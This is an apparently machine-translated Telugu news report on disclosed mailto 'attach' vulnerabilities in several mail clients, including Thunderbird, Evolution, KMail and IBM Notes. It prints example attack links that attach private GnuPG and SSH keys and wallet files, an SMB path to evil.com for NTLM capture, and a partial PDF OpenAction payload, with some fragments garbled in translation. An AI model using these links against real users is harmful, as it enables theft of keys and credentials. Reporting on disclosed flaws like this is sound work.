రూర్ యూనివర్సిటీ బోచుమ్ (జర్మనీ) పరిశోధకులు
లింకులు «
మెయిల్ క్లయింట్లు Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL నోట్స్ (CVE-2020-4089) మరియు పెగాసస్ మెయిల్ మిమ్మల్ని స్వయంచాలకంగా పనికిమాలిన దాడికి గురి చేస్తాయి. ఏదైనా స్థానిక ఫైల్, “mailto:?attach=path_to_file” వంటి లింక్ ద్వారా పేర్కొనబడింది. హెచ్చరికను ప్రదర్శించకుండా ఫైల్ జోడించబడింది, కాబట్టి ప్రత్యేక శ్రద్ధ లేకుండా, అటాచ్మెంట్తో లేఖ పంపబడుతుందని వినియోగదారు గమనించకపోవచ్చు.
ఉదాహరణకు, “mailto: వంటి లింక్ని ఉపయోగించడం:[ఇమెయిల్ రక్షించబడింది]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" మీరు GnuPG నుండి ప్రైవేట్ కీలను అక్షరంలోకి చొప్పించవచ్చు. మీరు క్రిప్టో వాలెట్లు (~/.bitcoin/wallet.dat), SSH కీలు (~/.ssh/id_rsa) మరియు వినియోగదారుకు ప్రాప్యత చేయగల ఏవైనా ఫైల్ల కంటెంట్లను కూడా పంపవచ్చు. అంతేకాకుండా, “attach=/tmp/*.txt” వంటి నిర్మాణాలను ఉపయోగించి మాస్క్ ద్వారా ఫైల్ల సమూహాలను అటాచ్ చేయడానికి Thunderbird మిమ్మల్ని అనుమతిస్తుంది.
స్థానిక ఫైల్లతో పాటు, కొన్ని ఇమెయిల్ క్లయింట్లు IMAP సర్వర్లోని నెట్వర్క్ నిల్వ మరియు పాత్లకు లింక్లను ప్రాసెస్ చేస్తాయి. ప్రత్యేకించి, IBM గమనికలు “attach=\\evil.com\dummyfile” వంటి లింక్లను ప్రాసెస్ చేస్తున్నప్పుడు నెట్వర్క్ డైరెక్టరీ నుండి ఫైల్ను బదిలీ చేయడానికి మిమ్మల్ని అనుమతిస్తుంది, అలాగే దాడి చేసేవారిచే నియంత్రించబడే SMB సర్వర్కు లింక్ను పంపడం ద్వారా NTLM ప్రమాణీకరణ పారామితులను అడ్డగించవచ్చు. (అభ్యర్థన ప్రస్తుత ప్రమాణీకరణ పారామితుల వినియోగదారుతో పంపబడుతుంది).
Thunderbird “attach=imap:///fetch>UID>/INBOX>1/” వంటి అభ్యర్థనలను విజయవంతంగా ప్రాసెస్ చేస్తుంది, ఇది IMAP సర్వర్లోని ఫోల్డర్ల నుండి కంటెంట్ని జోడించడానికి మిమ్మల్ని అనుమతిస్తుంది. అదే సమయంలో, IMAP నుండి తిరిగి పొందిన సందేశాలు, OpenPGP మరియు S/MIME ద్వారా గుప్తీకరించబడి, పంపే ముందు మెయిల్ క్లయింట్ ద్వారా స్వయంచాలకంగా డీక్రిప్ట్ చేయబడతాయి. థండర్బర్డ్ డెవలపర్లు
థండర్బర్డ్ యొక్క పాత వెర్షన్లు పరిశోధకులు ప్రతిపాదించిన PGP మరియు S/MIMEలపై మరో రెండు దాడి వేరియంట్లకు కూడా హాని కలిగిస్తాయి. ప్రత్యేకించి, Thunderbird, అలాగే OutLook, PostBox, eM Client, MailMate మరియు R2Mail2, మెయిల్ క్లయింట్ స్వయంచాలకంగా S/MIME సందేశాలలో ప్రసారం చేయబడిన కొత్త సర్టిఫికేట్లను స్వయంచాలకంగా దిగుమతి చేసి, ఇన్స్టాల్ చేయడం వలన కీ రీప్లేస్మెంట్ దాడికి గురయ్యాయి. వినియోగదారు ఇప్పటికే నిల్వ చేసిన పబ్లిక్ కీల ప్రత్యామ్నాయాన్ని నిర్వహించడానికి దాడి చేసే వ్యక్తి.
రెండవ దాడి, థండర్బర్డ్, పోస్ట్బాక్స్ మరియు మెయిల్మేట్లకు అవకాశం ఉంది, డ్రాఫ్ట్ సందేశాలను స్వయంచాలకంగా సేవ్ చేయడానికి మెకానిజం యొక్క లక్షణాలను తారుమారు చేస్తుంది మరియు మెయిల్టో పారామితులను ఉపయోగించి, ఎన్క్రిప్టెడ్ సందేశాల డిక్రిప్షన్ లేదా ఏకపక్ష సందేశాల కోసం డిజిటల్ సంతకాన్ని జోడించడాన్ని ప్రారంభించడానికి అనుమతిస్తుంది. దాడి చేసేవారి IMAP సర్వర్కు ఫలితం యొక్క తదుపరి ప్రసారం. ఈ దాడిలో, సైఫర్టెక్స్ట్ “బాడీ” పరామితి ద్వారా ప్రసారం చేయబడుతుంది మరియు దాడి చేసేవారి IMAP సర్వర్కు కాల్ని ప్రారంభించడానికి “మెటా రిఫ్రెష్” ట్యాగ్ ఉపయోగించబడుతుంది. ఉదాహరణకి: ' '
వినియోగదారు పరస్పర చర్య లేకుండా “mailto:” లింక్లను స్వయంచాలకంగా ప్రాసెస్ చేయడానికి, ప్రత్యేకంగా రూపొందించిన PDF పత్రాలను ఉపయోగించవచ్చు - PDFలోని OpenAction చర్య పత్రాన్ని తెరిచేటప్పుడు స్వయంచాలకంగా mailto హ్యాండ్లర్ను ప్రారంభించేందుకు మిమ్మల్ని అనుమతిస్తుంది:
%PDF-1.5
1 0 obj
<< /రకం /కాటలాగ్ /ఓపెన్ యాక్షన్ [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——PGP సందేశాన్ని ప్రారంభించండి—[…])>>
endobj
మూలం: opennet.ru